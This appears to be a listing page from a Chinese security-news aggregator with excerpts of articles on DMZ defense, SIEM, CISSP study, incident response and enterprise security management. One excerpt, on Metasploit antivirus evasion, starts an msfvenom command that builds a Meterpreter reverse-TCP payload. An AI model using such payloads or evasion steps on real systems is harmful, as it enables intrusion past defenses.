记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

【实战案例分享】DMZ区防御体系技战法

一、实践背景 近几年,参加国家级、省级攻防演练蓝队主防大大小小10几次,在各类政府、央企集团、大型国企等多样且复杂的网络环境中,在前期需要花费大量精力梳理客户资产,帮客户建立一套纵深防御系统。 在整个攻防演练对抗过程中,作为防守方不仅要防止外部突破,也要防止内部横向渗透。最重要的是如何防守住外部突破的口子,通常对外的口子主要有:互联网对外系统、VPN连接进内网、办公网络、分支机构专线。本文主要分享互联网DMZ区防护系统的关键点。
发布时间:2021-06-30 16:49 | 阅读:39070 | 评论:0 | 标签:安全管理 DMZ 区防御体系 溯源 溯源反制 防御 体系

网络态势感知是什么?

目前,对网络安全态势感知并未有一个统一而全面的定义,概念上可以大致理解为:网络安全态势感知是综合分析网络安全要素、评估网络安全状况、预测其发展趋势,并以可视化的方式展现给用户,并给出相应的报表和应对措施。 拆分四个步骤: 1、数据采集:通过各种检测工具,对各种影响系统安全性的要素进行检测采集获取,这一步是态势感知的前提。(包括网络结构数据、网络服务数据、漏洞数据、脆弱性数据、威胁与入侵数据、用户异常行为数据等) 2、态势理解:对各种网络安全要素数据进行分类、归并、关联分析等手段进行处理融合,对融合的信息进行综合分析,得出影响网络的整体安全状况,这一步是态势感知基础。
发布时间:2021-06-23 15:18 | 阅读:50844 | 评论:0 | 标签:安全管理 态势感知 态势理解 态势评估 态势预测 数据采集 态势 网络

安全负责人如何有效向高管层汇报

随着网络攻击对组织机构造成的危害越来越严重,企业高管层、董事会越来越关注网络安全,越来越多地要求安全负责人就潜在威胁和风险状况进行汇报。但实际上,由于企业高管层和董事会成员更多地是关注业务发展,而对安全领域并不太了解,因此,他们并不确定自己希望得到什么样的答复。“我们的安全状况如何?”、“能不能保证我们不会成为下一个XXXX<某个知名安全事件的受害者>?”他们经常提问的这些问题貌似很简单,但回答起来并不容易,因为存在太多的不确定性因素,几乎没办法回答,即使可以回答,也很难让他们特别信服。 在安全负责人向高管层、董事会进行汇报时,都会面临同样的问题。
发布时间:2021-05-19 15:43 | 阅读:52571 | 评论:0 | 标签:转载 安全管理 安全

CISSP“蒙关”功夫指南

前言:  2021年3.25考试结束,走出考场,拿到考试人员递过来的结果,看到上面有"恭喜初步通过考试..."的字样,又找了通过的朋友确认考试通过了,才稍微松了一口气,走出考场脑子都还是蒙的,所以就给大家写一写我的“蒙关”笔记吧,希望能给大家一点帮助。
发布时间:2021-03-30 12:49 | 阅读:63954 | 评论:0 | 标签:安全管理 ALO CISSP 官方指南 应试指南

善谋者胜|HVV大型攻防演练检测篇

HVV行动作为国家级攻防演练具有重大意义,旨在通过检验单位网络和信息基础设施的安全防护、应急处置和指挥调度能力,提高信息系统的综合防御能力。而要打好一场完美的防守战役应该先从组织本身的脆弱性整改开始,其整改工作应该具备全局性视图。   本文将主要从HVV行动第一阶段,即,准备阶段时涉及到的检测内容和要点进行梳理和分析,并给出相应的加固建议。 1、整体安全整改 从整体整改视图出发,到梳理相关资产,发现相关风险,以此开展相应工作等整体安全加固能全面有序的帮助大家度过前期的安全整改工作,为HVV攻防演练奠定坚实基础。
发布时间:2021-03-19 16:24 | 阅读:148180 | 评论:0 | 标签:安全管理 ElasticSearch任意文件读取 GlassFish HW JBOSS Jekins任意读取 Rabbi

Metasploit免杀初探索

0x01 环境搭建 测试系统:windows10 (1909) 杀毒软件:360安全卫士 在线杀毒:VT 0x02 payload生成 msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 L
发布时间:2020-11-05 13:15 | 阅读:65803 | 评论:0 | 标签:安全管理 metasploit msfvenom Payload VT 免杀 编码 编码器 编码捆绑

包含“Backdoor”字样的英特尔泄露代码的初步分析

1 概述         北京时间2020年8月7日,瑞士软件工程师蒂尔·科特曼(Till Kottmann)发布了英特尔内部文件被泄露的信息[1]。约有20GB的被泄露文件已上传至文件共享网站MEGA,其中部分文件带有“机密”或“受限制的机密”字样的标记。据蒂尔·科特曼称,该信息是由一位匿名黑客提供,此次泄露的文件是一系列文件中的第一部分。
发布时间:2020-08-10 15:15 | 阅读:96928 | 评论:0 | 标签:安全管理 backdoor CPU芯片 Door Bell IOH SR 17 MemoryRas.c RAS Svos

删库背后,是权限管控的缺失

“删库”事件过去了,微盟原计划28号恢复商家服务,这事儿就算渐渐淡出了人们的视野,如今又好巧不巧被创始人的魔幻舆论推得一浪更比一浪高。 观众吃瓜一时爽,企业也纷纷顺着热点蹭上来,踩着别人的错误往上爬,还能花样踢腿加劈叉。整个安全圈一片喜气洋洋。 实际上大家彼此心知肚明,这次事件只需要最简单的双人复核就能避免,多一次打扰,少亏12亿。那么为什么最初级的操作也做不到呢? 一、原因分析篇 有人指出这次“删库”原因是微盟没有使用堡垒机,仅仅如此吗? 爱因斯坦说,问题往往不会在它发生的那个层面得到解决。 现在很多互联网公司对自己的技术非常有信心,为了节省成本,会选择基于开源软件自主研发安全产品。
发布时间:2020-03-07 11:49 | 阅读:146096 | 评论:0 | 标签:安全管理 删库 微盟 权限管控

疫情下个人数据安全和工作机制的思考

2019年12月武汉爆发了“新冠”病毒引发的疫情,病毒引起发烧、咳嗽等症状,具备“人传人”可能且暂无特效药,有人因此丢掉生命。正逢中国春节的到来,2020年武汉春运终有500万人离开,“人传人”从而引发疫情蔓延。1月25日中央成立应对疫情工作领导小组,全国各地疫情防控全面展开,我们都坚信在党中央的领导下防疫战役终能取得胜利。 有史以来人员出入最少,社区管理最严的春节与“新冠”疫情同时到来了。大家都能感觉到社区联防工作的效果非常好,各单位的工作协同前所未有的高效,这是必须点赞的,也为祖国上下同心和强大的执行力感到自豪。 我算专业做安全工作的,应该属于最早防控疫情的一拨人。
发布时间:2020-02-26 08:46 | 阅读:174985 | 评论:0 | 标签:安全管理 工作机制 数据安全 疫情

初识《关键信息基础设施网络安全保护基本要求》:基于等保,高于等保

写在前边 等保2.0刚刚实施不久,接踵而来的是《关键信息基础设施网络安全保护基本要求》。当前网络安全无论是技术还是国家战略,都需要我们持续关注并加强管理力度(请大家挺住,后边的标准还多呢)。打算开一个有关关保的系列,也不能算解读吧,毕竟还没有实施和实践,因此系列就暂定为《关保笔记》。目的就是给运维、管理人员一点思路,初步去理解关保,知道如何满足关保要求,如果配合企业和监管做好关键信息基础设施的网络安全保护工作。本篇作为开篇概述,后续更新将会以《关保笔记》(二)、(三)…为标题。
发布时间:2020-02-24 08:06 | 阅读:185003 | 评论:0 | 标签:安全管理 关键信息基础设施 等保 网络安全

这些知识点你都了解了吗?CISSP-D2:资产安全

内容概述 资产安全知识域涵盖信息和信息资产在其生命周期中的安全保护,包括恰当的收集、分类、处置以及控制措施的选择和使用。本知识域的重要概念包括数据的所有权、隐私、数据安全控制和相关密码学的应用。安全和风险管理知识域包含了许多基本的信息安全概念、原则以及信息安全管理相关活动和方法。 资产安全知识域在CISSP CBK中包括(源自于:CBK5): 一、资产安全概念 数据管理必须遵循一套广泛适用于组织的原则和程序。完善的数据策略可以指导组织仅仅收集所需的信息、确保这些信息安全,并且在不需要的时候安全的销毁它们。
发布时间:2020-02-11 14:09 | 阅读:93664 | 评论:0 | 标签:安全管理 CISSP CISSP-D2 资产安全

信息安全在哪里都一样

人们把信息安全分为管理和技术,工程可以归入管理与技术;把追求的目标分为合规和实效。我国的等级保护体系适用于各行各业,但是许多行业的行政监管部门基于行业的风险特征又从宏观上发布了一系列的监管标准,这些标准关注效果而不是过程。面对如此之多的合规监控,信息安全管理者往往忧心忡忡,焦虑不安,生怕在认证或监管中被发现缺陷而留下劣迹。实际上,信息安全管理围绕三个基本点展开即可,它们是原理、标准和实践。原理居首,因为标准制定从来没有违背原理的,实践在绝大多数情况下是现有原理与标准指导下的活动。管理者与其以监管为中心不如以原理为中心,去构建分层次的、弹性的信息安全体系。而且,这个体系应当是一套而不是多套。
发布时间:2017-09-03 17:55 | 阅读:267993 | 评论:0 | 标签:牛闻牛评 信息安全体系 安全管理 监管

安全人员应急响应工具箱

*本文原创作者:Shun,本文属FreeBuf原创奖励计划,未经许可禁止转载 本文旨在帮助安全分析师和DFIR团队更好的完成工作,现整理了一些现在比较流行的安全事件应急响应工具和资源列表。
发布时间:2017-06-22 21:45 | 阅读:240229 | 评论:0 | 标签:安全管理 工具 安全事件应急响应 安全分析师 工具箱

你会把安全控制权交由第三方外包吗?

较早几年,把一些重要网络和系统服务资产进行外包安全管理几乎不敢想像,但现在,面对每天频繁多变的网络攻击,很多公司认为,这种方式更能有效减少安全风险。这种把安全控制权完全交由第三方来管理的手段可不可行?我们随着Freebuf来听听各位专家的观点。 对于公司采用安全外包管理的前提,很多厂商企业表示这取决于公司的人员配备水平。如果公司内部缺乏相应的专业技能,或是因成立安全管理团队而缺乏预算资金的中小企业,可以采用这种方式。因此,在面对数据窃取和BYOD(员工携带自己设备办公)的风险担忧时,与安全管理服务提供商(安全外包服务商,MSSP)的合作成为使然。
发布时间:2017-06-06 16:40 | 阅读:190742 | 评论:0 | 标签:企业安全 安全管理 MSSP

快速识别重要威胁:威胁情报与SIEM的结合

ThreatConnect是威胁情报代表性企业之一,著名的钻石模型理论提出者。ThreatConnect近期发布了一份报告,讲述企业如何通过威胁情报平台来增强SIEM/SOC的安全能力,以便更全面的理解威胁、消除误报,形成主动、智能的防御体系。小编带您一起具体了解下这份报告的内容。 1. 从SIEM的本质出发,它是用来做什么的?有哪些局限? 安全信息与事件管理系统(SIEM)在国内我们通常更倾向于称之为安全运营中心(以下简称SOC),主要用于发现整个企业中的趋势和态势,从多种事件和具有上下文信息的数据源中收集和分析安全事件, SIEM支持威胁检测和安全事件响应——即:一个界面可以连接所有数据。
发布时间:2017-04-19 15:55 | 阅读:181633 | 评论:0 | 标签:企业安全 安全管理

匡恩网络助力常德市烟草公司构建六重安全保障

随着“数字烟草”的发展,客户通过网络向省烟草公司订货成为新常态,物流配送借助网络技术的发展成为了常德烟草公司的整体业务流程核心,物流分拣系统成为订单处理和数据保护的关键。匡恩网络在工控安全领域“精耕细作”,已成为烟草行业工控网络安全防护体系的领军企业,在给常德市烟草公司建设安全技术防护体系时,凭借多年的经验为烟厂信息安全保驾护航。 掌握基础数据、发现问题隐患、应用技术标准是做好安全管理工作的三项重点内容。匡恩网络在为常德市烟草公司建设安全技术防护系统之前用了大量的时间进行基础调研、梳理系统需求、整理管理流程,力求安全技术防护系统与安全生产标准化规范有机融合,在提升管理效率和管理质量上下功夫。
发布时间:2017-04-08 01:35 | 阅读:146189 | 评论:0 | 标签:厂商供稿 匡恩网络 安全管理 工控网络 烟草公司

次世代SIEM?IBM眼中的SOAPA

安全信息和事件管理(SIEM)产品及服务负责从大量企业安全控件、主机操作系统、企业应用和企业使用的其他软件中收集安全日志数据,并进行分析和报告。有些SIEM还可以试图阻止它们检测到正在进行的攻击,这可能帮助阻止破坏或者限制成功攻击可能造成的损坏。但是这段时间SIEM似乎遇到了强有力的挑战,现在的市场在推一种名叫SOAPA的概念,有些人说它会取代SIEM,果真如此吗?《SOAPA来临,SIEM时代终结?》 如今,市场正在逐渐地往SOAPA偏移,IBM对Resilient System以及Splunk对Caspida的收购就是对这个趋势最好的见证。
发布时间:2017-03-28 03:00 | 阅读:183734 | 评论:0 | 标签:企业安全 安全管理 SOAPA

企业安全建设之主机级资产管理与分析

*原创作者:兜哥,本文属Freebuf原创奖励计划,未经许可禁止转载 前言 通常认为企业安全视角的资产包括网络级、应用级、主机级。本文重点讲解如何利用开源软件获取主机级资产以及入侵检测和主机审计。网络级、应用级请看下文。 企业安全视角的主机级资产 主机级资产重点关注的是进程、网络连接、账户等主机层面或者说OS级别的信息。 需求 我认为搜集主机级资产主要是达到两个目的: 事中的入侵检测 事后的审计与事故排查 数据搜集 主机级数据的搜集可以使用开源软件osquery。
发布时间:2017-03-14 19:10 | 阅读:163848 | 评论:0 | 标签:企业安全 安全管理 资产管理与分析

企业承受的攻击面扩大,安全应该考虑网络层以外的东西

威胁企业安全的新技术频出,相关负责人应采用更全面的企业风险管理方法。 数十年以来,企业和组织都将其安全工作的重心放在网络边界防御,以及如何加强服务器、计算机和网络设备的安全性。随着软件定义网络的普及,攻击面不断扩大,企业需要跳出网络层,并考虑以下问题:边界被打破,攻击面扩大,现有的企业安全模式为什么会因此失效?企业应采取哪些措施,应对快速变化的安全威胁? 由于需要保护的攻击面急剧扩大,并将继续扩大,欲攻克网络安全问题,企业需要打一场硬仗。过去,企业做好网络层和端点保护就足够了。但现在,各种应用、云服务和移动设备越来越多,企业面对的攻击面也急剧扩大。 这一点在最近一份调查中得到了证实。
发布时间:2017-02-26 16:50 | 阅读:163331 | 评论:0 | 标签:企业安全 安全管理 应用层安全

企业邮件安全防护经验总结

I. 邮件是网络攻击的首要突破口 邮件作为企业(特别是传统和大型企业)的主要沟通工具关键程度日益提升,同时安全问题也日益益突出。邮件协议缺乏认证和安全鉴别机制,因此天然具备防追踪和高性价比的特性,邮件已经成为电信诈骗、勒索软件攻击的主要途径。目前大众普遍认为邮件安全就是钓鱼攻击(phishing),其实邮件安全的领域很广,本文基于工作中的知识与大家多维度分享一下。
发布时间:2017-02-26 00:15 | 阅读:372436 | 评论:0 | 标签:企业安全 安全管理

【RSA 2017专题】成为高水平CISO的5大秘密,将在RSA揭晓

高水平的CISO具备什么样的能力?他们的能力如何评估?IANS Research开发的CISO影响力(CISO Impact)模型,也许可以揭示成功的CISO背后的秘密。 CISO影响力模型简介 CISO影响力模型,是IANS在2014年开发的一个研究框架,用以调查研究高效的信息安全团队。IANS基于CISO影响力模型的上万个数据点,在2015年推出了CISO影响力模型2.0。 这个模型聚焦CISO的两大基本能力:技术能力和组织参与度。
发布时间:2017-02-17 00:40 | 阅读:174505 | 评论:0 | 标签:企业安全 安全管理 CISO

企业安全建设之自建准入系统

*本文原创作者:兜哥,本文属FreeBuf原创奖励计划,未经许可禁止转载 本文介绍了下自建准入系统的经历,该系统在某大型互联网公司稳定运行了5年。 准入系统简介 网络准入控制 (NAC)是一项由思科发起、多家厂商参加的计划,其宗旨是防止病毒和蠕虫等新兴黑客技术对企业安全造成危害。借助NAC,企业可以只允许合法的、值得信任的设备(例如PC、服务器、PDA)接入网络,而不允许其它设备接入。
发布时间:2017-02-15 15:25 | 阅读:353729 | 评论:0 | 标签:企业安全 安全管理 NAC 准入控制

有了漏洞扫描器,如何用好?一点不成熟的小总结

*本文原创作者:德约杲杲,本文属FreeBuf原创奖励计划,未经许可禁止转载 昨天晚上做梦,梦见不知道在之前还是现在的哪家公司,跟同事老板谈hc,说到,当前最大的问题是,人力问题,是人力不够。只有人力解决了,这个team才能运转下去。我就问,那你们团队是做啥的呢?他说做扫描器和漏洞运营。梦里就开始回想在以前公司中,各种方法有效的效率提高和人力节省措施,我就回了一句,人力当然重要,不然事情做不起来,同时在有一定人力的情况下,方法更重要。接着,就开始就扫描器的使用高谈阔论了起来。
发布时间:2017-02-09 10:10 | 阅读:193935 | 评论:0 | 标签:企业安全 安全管理 观点 扫描器 扫描 漏洞

互联网企业安全建设之路:规划篇

*本文作者:SecSky,文章属FreeBuf原创奖励计划,未经许可不得转载 新年伊始,我决定写一篇关于互联网企业安全建设的文章。一来是把自己之前做过的和目前正在做的一些事情以及想法总结一下,二来是希望可以帮助对互联网企业安全建设感兴趣或是有这方面需求的朋友。 整篇文章分为三大部分: 一、互联网企业为什么要做安全 二、互联网企业需要什么样的安全 三、互联网企业如何做好安全 这也是我在企业安全建设过程中给自己提出和不断思考的问题。
发布时间:2017-02-08 17:35 | 阅读:171284 | 评论:0 | 标签:企业安全 安全管理

安全管理该重视“社交关系”了,白名单也许是最佳方案

在防火墙设置中,implicit deny和explicit allow是两种核心的信息安全基础观念。但随着规模和复杂度的逐步扩大,我们发现我们需要允许的东西比我们要拒绝的东西要少得多得多。 这种对所有东西说“不”,除非我们知道它无害的规则在很多新的技术中都有应用,比如应用程序白名单、七层防火墙(WAF)、自适应认证等。我们的科技采用了新科技,但是我们在社交关系中却没有——随着攻击者越来越倾向于使用基于社交网络、社工技术,显然我们需要修改我们的行为方式,在处理与他人的社交关系时也需要采用白名单。 内部信任 就像我们有可信的内部网络和内部系统,我们同样应该找一些内部团队作为我们信息的可信来源。
发布时间:2017-02-08 01:00 | 阅读:206645 | 评论:0 | 标签:安全管理 观点

基于开源程序漏洞的攻击在2017年将增长20%

现在,无论是商业软件还是程序员自行开发的小程序,开源代码已经变得越来越普遍了,而开源似乎也已经成为了一种趋势。但需要注意的是,Black Duck软件公司的研究人员根据他们对开源项目所收集到的统计数据预测到,基于开源软件漏洞的网络攻击活动数量在2017年将增长20%。 Black Duck软件公司的安全策略副总裁Mike Pittenger表示,商业软件项目的免费版本数量已经超过了50%甚至更多,而开源软件产品所占比重从2011年的3%增长到了现在的33%。平均每一款商业软件都会使用超过100个开源组件,而且三分之二的商业应用代码中已知是存在安全漏洞的。
发布时间:2017-02-05 23:15 | 阅读:175291 | 评论:0 | 标签:企业安全 安全报告 安全管理 开源漏洞 漏洞

对话信息共享与分析中心(ISAC)CEO:网络安全威胁信息共享的新挑战

近些年来,人们一直都在讨论网络安全信息共享的重要性。毕竟,只有少数组织可以在没有互联网的环境下工作,而几乎没有任何一个组织可以在没有外界帮助的情况下了解当前所有的网络威胁。 很多公司的首席信息安全官也发现,如果与行业内的其他公司共享网络安全方面的信息,他们就可以同归对比各自的安全策略和实践方式来找出自身在安全保护方面的短处,并提升安全机制的成熟度。但是,共享信息的过程并没有我们想象中的那么顺利。 信息共享重要性正得以体现 很多组织在共享网络安全方面的信息时通常会非常的警惕,尤其是在与政府部门合作的时候。
发布时间:2017-01-26 14:30 | 阅读:182760 | 评论:0 | 标签:安全管理 威胁情报共享

企业选购或厂商优化SIEM产品时应考虑哪些因素?

引言 SIEM(安全信息与事件管理)在SOC操作中心中扮演着十分重要的角色,可以说它是SOC的心脏,能够收集事件并按照配置好的规则进行事件分析,同时向安全分析师发出系统入侵等异常行为的告警,并执行SOC程序。 本文旨在帮助企业评估并采购合适的SIEM产品,搭建他们自己的SOC操作中心。以下整理的内容会对SIEM的POC(概念证明,可理解为产品测试,证实产品的各项优异性能)产生一定帮助。 文章主要介绍购买SIEM产品的基本思路,帮助客户获得最符合企业安全需求的SIEM技术。当然提供SIEM服务(SaaS)的安全公司也能从中获益,根据所列要点提高产品的客户满意度,扩大市场占有率。
发布时间:2017-01-24 12:45 | 阅读:202419 | 评论:0 | 标签:企业安全 安全管理 观点 SIEM soc

有关事件响应(IR)自动化和协同的几点反思

有关事件响应(IR)自动化和协同的几点反思 IR(incident response),顾名思义,事件响应,旨在对一些潜在的危机,如数据外泄、DoS或DDoS攻击、防火墙外泄、病毒或恶意软件爆发等威胁进行响应。 随着各种项目互联网化,商业事件响应工具增势甚猛。 就在本周,我重新回顾了几个有关事件响应(IR)自动化和协同的采访。很多专业从事网络安全的专业人士参与了这些采访,他们共同指出了一些值得我们反思的问题: 1、IR通常由基本工具、手动过程和关键人员组成。
发布时间:2017-01-21 01:50 | 阅读:160578 | 评论:0 | 标签:企业安全 安全管理 观点 事件响应 反思

安全抽象:网络安全生态系统从复杂臃肿到有效自动化的发展之道

当前,全球网络安全形势错综复杂,甚至难以管控。究其原因,一方面在于各种高级网络攻击活动持续增多,从本质上打破了安全平衡;另一方面在于,让人眼花缭乱的各类安全产品应运而生,然而,这些安全产品虽各具功能特色,但也容易陷入“安全孤岛”,从总体上限制了安全效应发挥。 举例来说,假如一个机构,为安全投资部署了至少35种不同技术和上百种安全设备,然而由于这些技术设备使用的协议和运行模式不同,其最终结果可能是,构建了一堆“笨拙、反应迟钝”的安全设施平台,达不到建造安全、发挥安全的目的。相反,这种情况,可能还会被攻击者利用。
发布时间:2017-01-17 14:55 | 阅读:156397 | 评论:0 | 标签:安全管理 观点 安全抽象 机器学习

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求打赏·赞助·支持💖

标签云